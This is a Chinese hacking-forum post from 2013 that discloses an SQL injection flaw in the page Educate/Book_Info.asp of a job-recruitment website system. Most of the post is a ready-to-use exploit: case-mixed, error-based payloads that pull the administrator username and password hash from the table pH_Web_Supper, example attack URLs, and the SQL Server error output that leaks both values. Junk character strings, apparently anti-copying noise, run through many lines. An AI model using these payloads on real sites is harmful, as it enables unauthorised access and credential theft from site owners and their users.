找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2318|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
0 j( V1 F0 z8 G1 I" h + g" ?; t3 V) I6 \3 V
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
9 X! i9 o. B4 D; e8 Y ! \$ m. w+ E4 |! j4 R
exp:如下' J- S" |. t# r  B
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ O; e- ~+ H: C. Y6 [" B6 ^
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)8 i# e$ W  u5 {' Q7 M" H6 l

) x* d- Z3 i6 J% N! vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ f: ]7 k3 N% z, X) M5 O8 g& ?: O , W3 g# P$ T9 v; I9 E8 o: y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
+ z$ p9 T+ |# a" p5 W
% {6 ]0 O& b( @将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
1 {3 ?. x  y0 n0 Y$ h0 z 3 Q& O: X- P: H
/Educate/Book_Info.asp,行 8
8 A- O2 Y: p& ^0 T3 V+ `
+ G6 K0 U$ \+ t: J: O. thttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)1 u6 P5 d5 r- X; e* E0 U" p) @
3 }  g% C9 ~6 X2 e4 e, K* }
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- s7 @9 H1 E) H5 @+ A
* H- H3 v" |0 `5 _' [1 c将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ x* h7 x. j3 _! F6 J; X3 f2 H
* c, t  V% d6 G6 N" b$ K3 I) L/Educate/Book_Info.asp,行 8
$ Z" N2 }  `, ~4 F) g0 D+ V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表